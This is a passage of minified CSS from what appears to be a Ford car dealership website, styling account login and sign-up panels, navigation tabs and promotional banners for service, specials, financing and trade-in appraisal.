.dONquv{left:-100%}.dUaGmK{position:absolute;width:100%;height:100%;-webkit-transition:left .4s ease-in-out,left .4s ease-in-out;transition:left .4s ease-in-out,left .4s ease-in-out;padding:15px;overflow-x:hidden;overflow-y:auto;left:100%}.sc-ekHBYt.resetting-password .dUaGmK{left:0}.dSnjEh{position:absolute;width:100%;height:100%;-webkit-transition:left .4s ease-in-out,left .4s ease-in-out;transition:left .4s ease-in-out,left .4s ease-in-out;padding:15px;overflow-x:hidden;overflow-y:auto;left:100%}.sc-ekHBYt.sign-up .dSnjEh{left:0}.sc-ekHBYt.signing-up .dSnjEh{left:-100%}.isxwqY{position:absolute;width:100%;height:100%;-webkit-transition:left .4s ease-in-out,left .4s ease-in-out;transition:left .4s ease-in-out,left .4s ease-in-out;padding:15px;overflow-x:hidden;overflow-y:auto;left:100%}.sc-ekHBYt.signing-up .isxwqY{left:0}.eiPzFN{position:absolute;width:100%;height:100%;-webkit-transition:left .4s ease-in-out,left .4s ease-in-out;transition:left .4s ease-in-out,left .4s ease-in-out;padding:15px;overflow-x:hidden;overflow-y:auto;left:100%}.sc-ekHBYt.logging-out .eiPzFN{left:-100%}.sc-ekHBYt.account .eiPzFN{left:0}.blevrK{position:absolute;width:100%;height:100%;-webkit-transition:left .4s ease-in-out,left .4s ease-in-out;transition:left .4s ease-in-out,left .4s ease-in-out;padding:15px;overflow-x:hidden;overflow-y:auto;left:100%}.sc-ekHBYt.logging-out .blevrK{left:0}.bClNws{width:100%;position:relative}.jpYyju{width:100%;position:relative}.bFQrxy.bFQrxy{width:100%;height:40px;border:none;outline:0;border-radius:6px;text-align:center;font-size:14px;color:#fff;margin:0 0 15px 0;padding:0 10px}.bFQrxy.bFQrxy[name=password]{-webkit-text-security:disc}.bFQrxy.bFQrxy,.bFQrxy.bFQrxy:active,.bFQrxy.bFQrxy:focus{background-color:#424242}.cVDDPa.cVDDPa{display:block;background-color:#d71820;color:#fff;border:none;border-radius:2px;width:100%;height:40px;line-height:40px;font-size:14px;text-transform:uppercase;text-align:center;margin:10px 0;cursor:pointer;outline:0;-webkit-text-decoration:none;text-decoration:none;padding:1px 7px 2px}.dZAGSV{color:red;font-weight:700;background-color:pink;padding:2px;border:1px solid red;margin:1em 0}.jHXAdR{display:block;text-align:center}.iYIlYh{display:block;margin:20px;text-align:center}.iNwmcz.iNwmcz{font-size:14px;text-transform:uppercase;color:#d71820;-webkit-text-decoration:underline;text-decoration:underline;margin-bottom:10px}.cisAUF{cursor:pointer}.hsPEoE{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bYgfZs{-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;height:1px;border-top:1px solid #fff}.fhsInK{-webkit-box-flex:0;-webkit-flex-grow:0;-ms-flex-positive:0;flex-grow:0;margin:10px}.cJXjku{font-size:14px;line-height:16px;padding:2px;position:relative;height:80px}.eQDKhU{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;width:100%;height:100%;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;padding:0 6px;background-color:#444;-webkit-transition:background-color .4s ease-in-out;transition:background-color .4s ease-in-out}.eQDKhU:hover{background-color:#555}.kSQXnb{display:block;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0}.kSQXnb,.kSQXnb:hover{color:#fff;-webkit-text-decoration:none;text-decoration:none}.eaUGlQ{font-weight:700}.eOFbyi{-webkit-text-decoration:underline;text-decoration:underline}.iaHKBE{-webkit-box-flex:0;-webkit-flex-grow:0;-ms-flex-positive:0;flex-grow:0;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0;width:24px;height:100%;text-align:right;cursor:pointer;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center}.iaHKBE .material-icons{-webkit-transition:color .4s ease-in-out;transition:color .4s ease-in-out}.iaHKBE:hover .material-icons{color:#fff;font-weight:700}.kSHzFa{display:inline-block;cursor:pointer}.gZjVkf{width:25px;margin:5px;-webkit-box-flex:0;-webkit-flex-grow:0;-ms-flex-positive:0;flex-grow:0;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0}.bIUEdz{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;height:60px}.gunzTT{display:block;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1}.gunzTT,.gunzTT:active,.gunzTT:focus,.gunzTT:hover,.gunzTT:visited{-webkit-text-decoration:none;text-decoration:none;color:#fff}.lfbZcs{font-size:14px;line-height:16px}.iLYHHX{text-transform:uppercase;margin:8px 0;font-size:20px}.iDyXGW{outline:0;cursor:pointer}.jwmmcQ{padding:16px;height:100%;overflow-x:hidden;overflow-y:auto}.eEUiqa,.eEUiqa *{box-sizing:border-box}.eEUiqa.eEUiqa{color:#fff;background:#262523;overflow:hidden}.cZpyWc{position:absolute;overflow-x:hidden;overflow-y:hidden;top:0;left:0;height:100%;width:100%;-webkit-transition:left .2s ease-in-out;transition:left .2s ease-in-out;padding-top:50px;left:-100%}.account .cZpyWc{left:-100%}.shop .cZpyWc{left:0}.gLrMCP{position:absolute;overflow-x:hidden;overflow-y:hidden;top:0;left:0;height:100%;width:100%;-webkit-transition:left .2s ease-in-out;transition:left .2s ease-in-out;padding-top:50px;left:-100%}.account .gLrMCP{left:0}.shop .gLrMCP{left:100%}.fdmzHg{position:absolute;top:0;left:0;height:50px;width:100%;z-index:10}.dEYHnQ{position:absolute;top:0;height:100%;width:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex}.kzoAAg{width:50%;height:100%;text-transform:uppercase;cursor:pointer;text-align:center;padding-top:10px;font-size:18px}.eosNiI{position:absolute;width:50%;height:8px;background-color:#d71820;bottom:0;-webkit-transition:left .2s ease-in-out;transition:left .2s ease-in-out}.shop .eosNiI{left:0}.account .eosNiI{left:50%}.bBzUYS{height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex}.gNtFqn{background-color:rgba(51,51,51,.8);position:absolute;left:0;top:0;width:100%;height:100vh;opacity:1;-webkit-transition:top .25s ease-in-out,left .25s ease-in-out,height .25s ease-in-out;transition:top .25s ease-in-out,left .25s ease-in-out,height .25s ease-in-out;top:50px;height:calc(100vh - (50px + 0px))}.gNtFqn.hidden{opacity:0;-webkit-animation:etSMyW .25s ease-in-out;animation:etSMyW .25s ease-in-out}.gNtFqn.hiddenLeft{left:-100%}.gNtFqn.hiddenRight{left:100%}.gNtFqn.hiddenTop{top:-100vh}.gNtFqn.hiddenBottom{top:100vh}.gNtFqn.search-bar{top:calc(50px + 50px);height:calc(100vh - (50px + 50px + 0px))}.gNtFqn.search-bar.hiddenTop{top:calc(-100vh + (50px + 50px + 0px))}.gNtFqn.search-bar.hiddenBottom{top:calc(100vh + (50px + 50px + 0px))}.gNtFqn.hiddenTop{top:calc(-100vh + (50px + 0px))}.gNtFqn.hiddenBottom{top:calc(100vh + (50px + 0px))}@media (min-width:783px){.gNtFqn{top:50px;height:calc(100vh - (50px + 0px))}.gNtFqn.search-bar{top:calc(50px + 50px);height:calc(100vh - (50px + 50px + 0px))}.gNtFqn.search-bar.hiddenTop{top:calc(-100vh + (50px + 50px + 0px))}.gNtFqn.search-bar.hiddenBottom{top:calc(100vh + (50px + 50px + 0px))}.gNtFqn.hiddenTop{top:calc(-100vh + (50px + 0px))}.gNtFqn.hiddenBottom{top:calc(100vh + (50px + 0px))}}@media (min-width:1024px){.gNtFqn{top:0;height:calc(100vh - (0px + 0px));display:none}.gNtFqn.search-bar{top:calc(0px);height:calc(100vh - (0px + 0px))}.gNtFqn.search-bar.hiddenTop{top:calc(-100vh + (0px + 0px))}.gNtFqn.search-bar.hiddenBottom{top:calc(100vh + (0px + 0px))}.gNtFqn.hiddenTop{top:calc(-100vh + (0px + 0px))}.gNtFqn.hiddenBottom{top:calc(100vh + (0px + 0px))}}.cXirUR{background-color:rgba(255,255,255,.8);position:absolute;left:0;top:0;width:100%;height:100vh;opacity:1;-webkit-transition:top .25s ease-in-out,left .25s ease-in-out,height .25s ease-in-out;transition:top .25s ease-in-out,left .25s ease-in-out,height .25s ease-in-out;top:50px;height:calc(100vh - (50px + 0px))}.cXirUR.hidden{opacity:0;-webkit-animation:etSMyW .25s ease-in-out;animation:etSMyW .25s ease-in-out}.cXirUR.hiddenLeft{left:-100%}.cXirUR.hiddenRight{left:100%}.cXirUR.hiddenTop{top:-100vh}.cXirUR.hiddenBottom{top:100vh}.cXirUR.search-bar{top:calc(50px + 50px);height:calc(100vh - (50px + 50px + 0px))}.cXirUR.search-bar.hiddenTop{top:calc(-100vh + (50px + 50px + 0px))}.cXirUR.search-bar.hiddenBottom{top:calc(100vh + (50px + 50px + 0px))}.cXirUR.hiddenTop{top:calc(-100vh + (50px + 0px))}.cXirUR.hiddenBottom{top:calc(100vh + (50px + 0px))}@media (min-width:783px){.cXirUR{top:50px;height:calc(100vh - (50px + 0px))}.cXirUR.search-bar{top:calc(50px + 50px);height:calc(100vh - (50px + 50px + 0px))}.cXirUR.search-bar.hiddenTop{top:calc(-100vh + (50px + 50px + 0px))}.cXirUR.search-bar.hiddenBottom{top:calc(100vh + (50px + 50px + 0px))}.cXirUR.hiddenTop{top:calc(-100vh + (50px + 0px))}.cXirUR.hiddenBottom{top:calc(100vh + (50px + 0px))}}@media (min-width:1024px){.cXirUR{top:0;height:calc(100vh - (0px + 0px));display:none}.cXirUR.search-bar{top:calc(0px);height:calc(100vh - (0px + 0px))}.cXirUR.search-bar.hiddenTop{top:calc(-100vh + (0px + 0px))}.cXirUR.search-bar.hiddenBottom{top:calc(100vh + (0px + 0px))}.cXirUR.hiddenTop{top:calc(-100vh + (0px + 0px))}.cXirUR.hiddenBottom{top:calc(100vh + (0px + 0px))}}.bNxQUf{color:#000;background-color:#333;width:100%;height:100%;overflow-x:hidden;overflow-y:auto;-webkit-overflow-scrolling:touch;position:absolute}.bNxQUf.hasChanged{background-color:#333}.kfETSJ{color:#000;background-color:#fff;width:100%;height:100%;overflow-x:hidden;overflow-y:auto;-webkit-overflow-scrolling:touch;position:absolute}.kfETSJ.hasChanged{background-color:#333}.ijdEqt{display:none;position:absolute;left:100%;width:320px}@media (min-width:1024px){.ijdEqt{display:block}}.dWtxyS{position:fixed;top:1px;left:1px;width:1px;height:1px;overflow:hidden}.hBTKjV{position:fixed;left:0;bottom:0;height:40px;width:100%;z-index:40}@media (min-width:1024px){.hBTKjV{display:none}}.hBTKjV.bottom-open{z-index:901}.fWsvHk{position:absolute;bottom:0;width:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:stretch;-webkit-box-align:stretch;-ms-flex-align:stretch;align-items:stretch;height:100%}.hveJag{position:absolute;bottom:0;width:100%;display:none;background:rgba(0,0,0,.6);height:100%}.bottom-open .hveJag{display:block}.jMCyAT{-webkit-flex:1;-ms-flex:1;flex:1;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;outline:0;cursor:pointer;height:100%;background:#212121}.jMCyAT:hover{-webkit-text-decoration:none;text-decoration:none}.gtkuaD{-webkit-flex:1;-ms-flex:1;flex:1;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;outline:0;cursor:pointer;height:100%;background:#424242}.gtkuaD:hover{-webkit-text-decoration:none;text-decoration:none}.WnDmE{-webkit-flex:1;-ms-flex:1;flex:1;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;outline:0;cursor:pointer;height:100%;background:#616161}.WnDmE:hover{-webkit-text-decoration:none;text-decoration:none}.hSOYsj{-webkit-flex:1;-ms-flex:1;flex:1;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;outline:0;cursor:pointer;height:100%;background:#757575}.hSOYsj:hover{-webkit-text-decoration:none;text-decoration:none}.dHrjUP{position:absolute;width:24px;height:38px}.hhIFZK{position:absolute;bottom:0;height:100%;z-index:1;cursor:pointer;color:#fff;background-color:#000;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;outline:0}.hhIFZK .text{-webkit-text-decoration:underline;text-decoration:underline;vertical-align:top}.hhIFZK.buttons-4{width:calc(100% / 4);left:calc(100% / 4 * 3)}.hhIFZK.buttons-5{width:calc(100% / 5);left:calc(100% / 5 * 3)}.hhIFZK.buttons-6{width:calc(100% / 6);left:calc(100% / 6 * 3)}@-webkit-keyframes etSMyW{from{opacity:1}99%{opacity:1}to{opacity:0}}@keyframes etSMyW{from{opacity:1}99%{opacity:1}to{opacity:0}}@-webkit-keyframes kxzfpx{0%{-webkit-transform:perspective(120px) rotateX(0) rotateY(0);-ms-transform:perspective(120px) rotateX(0) rotateY(0);transform:perspective(120px) rotateX(0) rotateY(0)}50%{-webkit-transform:perspective(120px) rotateX(-180.1deg) rotateY(0);-ms-transform:perspective(120px) rotateX(-180.1deg) rotateY(0);transform:perspective(120px) rotateX(-180.1deg) rotateY(0)}100%{-webkit-transform:perspective(120px) rotateX(-180deg) rotateY(-179.9deg);-ms-transform:perspective(120px) rotateX(-180deg) rotateY(-179.9deg);transform:perspective(120px) rotateX(-180deg) rotateY(-179.9deg)}}@keyframes kxzfpx{0%{-webkit-transform:perspective(120px) rotateX(0) rotateY(0);-ms-transform:perspective(120px) rotateX(0) rotateY(0);transform:perspective(120px) rotateX(0) rotateY(0)}50%{-webkit-transform:perspective(120px) rotateX(-180.1deg) rotateY(0);-ms-transform:perspective(120px) rotateX(-180.1deg) rotateY(0);transform:perspective(120px) rotateX(-180.1deg) rotateY(0)}100%{-webkit-transform:perspective(120px) rotateX(-180deg) rotateY(-179.9deg);-ms-transform:perspective(120px) rotateX(-180deg) rotateY(-179.9deg);transform:perspective(120px) rotateX(-180deg) rotateY(-179.9deg)}}</style><style type="text/css" data-type="vc_shortcodes-custom-css" data-jro-atf-css>.vc_custom_1538632882320{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important}.vc_custom_1538632933246{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important}.vc_custom_1538632888986{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important}.vc_custom_1538632510694{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important}.vc_custom_1538645507136{background-color:#f5f8fc!important}.vc_custom_1548957526521{padding-top:3%!important;padding-bottom:10%!important;background-image:url(https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/nrh11.jpg?id=11291)!important;background-position:center!important;background-repeat:no-repeat!important;background-size:cover!important}.vc_custom_1538656557180{margin-bottom:0px!important;background:#f6fafd url(https://images-stag.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/largestar2_gopt.jpg?id=2412)!important;background-position:0 0!important;background-repeat:no-repeat!important}.vc_custom_1534220277182{margin-top:0px!important;margin-bottom:0px!important;border-top-width:0px!important;border-bottom-width:0px!important;padding-top:0px!important;padding-bottom:0px!important}.vc_custom_1537592031927{padding-top:0px!important;padding-bottom:0px!important}.vc_custom_1538617112490{padding-top:10px!important}.vc_custom_1538658223210{padding-top:10px!important}.vc_custom_1466637490055{margin-bottom:0px!important}.vc_custom_1538627169265{padding-top:25px!important}.vc_custom_1538631508688{padding-top:0px!important}.vc_custom_1547763111370{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important;background-image:url(https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/banner_service-21.jpg?id=12423)!important}.vc_custom_1538646833204{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important;background:#f0f0f0 url(https://images-stag.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/banner_newspecials_fw.jpg?id=2380)!important;background-position:center!important;background-repeat:no-repeat!important;background-size:cover!important}.vc_custom_1538635335447{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important}.vc_custom_1538635613307{padding-top:74px!important;padding-right:30px!important}.vc_custom_1538635449229{margin-bottom:25px!important}.vc_custom_1538657100946{margin-bottom:0px!important}.vc_custom_1538657091821{margin-top:0px!important;margin-bottom:20px!important;border-top-width:0px!important;border-bottom-width:0px!important;padding-top:0px!important;padding-bottom:0px!important}.vc_custom_1464726369532{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important}.vc_custom_1467810739319{padding-top:135px!important;padding-left:30px!important}.vc_custom_1538656191374{margin-bottom:0px!important}.vc_custom_1538657124395{margin-top:0px!important;margin-bottom:20px!important;border-top-width:0px!important;border-bottom-width:0px!important;padding-top:0px!important;padding-bottom:0px!important}.vc_custom_1547763233702{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important;background-image:url(https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/Appraise-Your-Trade-image1.jpg?id=12426)!important;background-position:center!important;background-repeat:no-repeat!important;background-size:contain!important}.vc_custom_1547763209903{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important;background-image:url(https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/banner_specials-11.jpg?id=12425)!important}.vc_custom_1538636504608{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important}.vc_custom_1531938067959{padding-top:155px!important;padding-right:130px!important;background-position:center!important;background-repeat:no-repeat!important;background-size:contain!important}.vc_custom_1538636258833{margin-bottom:0px!important}.vc_custom_1538657134595{margin-top:0px!important;margin-bottom:20px!important;border-top-width:0px!important;border-bottom-width:0px!important;padding-top:0px!important;padding-bottom:0px!important}.vc_custom_1464805354278{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important}.vc_custom_1468011579430{padding-top:155px!important;padding-left:30px!important}.vc_custom_1538636273217{margin-bottom:0px!important}.vc_custom_1538657143475{margin-top:0px!important;margin-bottom:20px!important;border-top-width:0px!important;border-bottom-width:0px!important;padding-top:0px!important;padding-bottom:0px!important}.vc_custom_1547763253914{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important;background-image:url(https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/banner_finance1.jpg?id=12427)!important}.vc_custom_1547763275253{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important;background-image:url(https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/banner_certified_fw1.jpg?id=12428)!important}.vc_custom_1466681649660{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important}.vc_custom_1468011589072{padding-top:155px!important;padding-right:30px!important}.vc_custom_1538636281819{margin-bottom:0px!important}.vc_custom_1538657183402{margin-top:0px!important;margin-bottom:20px!important;border-top-width:0px!important;border-bottom-width:0px!important;padding-top:0px!important;padding-bottom:0px!important}.vc_custom_1464726369532{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important}.vc_custom_1468011599067{padding-top:94px!important;padding-left:30px!important}.vc_custom_1538647271372{margin-bottom:25px!important}.vc_custom_1538636289323{margin-bottom:0px!important}.vc_custom_1538657168849{margin-top:0px!important;margin-bottom:20px!important;border-top-width:0px!important;border-bottom-width:0px!important;padding-top:0px!important;padding-bottom:0px!important}.vc_custom_1547763299546{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important;background-image:url(https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/Clearance11.jpg?id=12429)!important;background-position:center!important;background-repeat:no-repeat!important;background-size:cover!important}.vc_custom_1547763325346{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important;background-image:url(https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/Under-10k1.jpg?id=12430)!important}.vc_custom_1464726369532{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important}.vc_custom_1538642782386{padding-top:155px!important;padding-right:30px!important}.vc_custom_1541121348186{margin-bottom:0px!important}.vc_custom_1541121399503{margin-top:0px!important;margin-bottom:20px!important;border-top-width:0px!important;border-bottom-width:0px!important;padding-top:0px!important;padding-bottom:0px!important}.vc_custom_1464805354278{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important}.vc_custom_1468011579430{padding-top:155px!important;padding-left:30px!important}.vc_custom_1538656163978{margin-bottom:0px!important}.vc_custom_1538657205873{margin-top:0px!important;margin-bottom:20px!important;border-top-width:0px!important;border-bottom-width:0px!important;padding-top:0px!important;padding-bottom:0px!important}.vc_custom_1538646176009{padding-top:5%!important}.vc_custom_1538646166273{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:8%!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important}.vc_custom_1538646119475{padding-top:0px!important}.vc_custom_1538656478514{margin-bottom:0px!important}.vc_custom_1547763345363{margin-bottom:0px!important}.vc_custom_1538652325780{padding-top:60px!important;padding-bottom:80px!important}.vc_custom_1538644297025{margin-bottom:15px!important}.vc_custom_1468452293872{margin-top:0px!important;margin-right:0px!important;margin-bottom:0px!important;margin-left:0px!important;border-top-width:0px!important;border-right-width:0px!important;border-bottom-width:0px!important;border-left-width:0px!important;padding-top:0px!important;padding-right:0px!important;padding-bottom:0px!important;padding-left:0px!important}.vc_custom_1460616516386{margin-top:50px!important;margin-bottom:0px!important}.vc_custom_1465268992639{margin-top:0px!important;margin-bottom:0px!important;border-top-width:0px!important;border-bottom-width:0px!important;padding-top:0px!important;padding-bottom:0px!important}</style><style data-jro-atf-css>.rocket-contain img,.rocket-contain video,.rocket-contain-self{object-fit:contain;object-position:center center}.rocket-cover img,.rocket-cover video,.rocket-cover-self{object-fit:cover;object-position:center center}.rocket-contain img,.rocket-contain video,.rocket-contain-self{font-family:'object-fit:contain;object-position:center center;'!important}.rocket-cover img,.rocket-cover video,.rocket-cover-self{font-family:'object-fit:cover;object-position:center center;'!important}.atf-loading .hide-atf{position:relative;visibility:hidden}.bumDSr{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;position:relative;border:1px solid #aab1b2;border-radius:2px}.cdPWTB{width:100%}.eYaUKI{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;width:100%}.hqPbJw{position:absolute;top:50%;left:8px;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);outline:0}.euZBNF.euZBNF.euZBNF{width:100%;height:40px;line-height:40px;background-color:#fff;border:none;outline:0;border-radius:2px;text-align:center;font-size:16px;color:#000;padding:0 10px 0 40px;margin:0}.euZBNF.euZBNF.euZBNF::-webkit-input-placeholder{font-style:italic;color:#b5b5b5}.euZBNF.euZBNF.euZBNF::-moz-placeholder{font-style:italic;color:#b5b5b5}.euZBNF.euZBNF.euZBNF:-ms-input-placeholder{font-style:italic;color:#b5b5b5}.euZBNF.euZBNF.euZBNF::-ms-clear{display:none}.euZBNF.euZBNF.euZBNF:-moz-placeholder{font-style:italic;color:#b5b5b5}.ijAzrY{position:absolute;top:50%;right:0;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);cursor:pointer;line-height:40px;height:40px;outline:0;text-align:center;font-size:16px;color:#fff;background-color:#d71820;padding:0 10px}.jNHnWy{color:#000;background-color:#fff;width:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column}</style><style data-jro-atf-css>.rocket-contain img,.rocket-contain video,.rocket-contain-self{object-fit:contain;object-position:center center}.rocket-cover img,.rocket-cover video,.rocket-cover-self{object-fit:cover;object-position:center center}.rocket-contain img,.rocket-contain video,.rocket-contain-self{font-family:'object-fit:contain;object-position:center center;'!important}.rocket-cover img,.rocket-cover video,.rocket-cover-self{font-family:'object-fit:cover;object-position:center center;'!important}.atf-loading 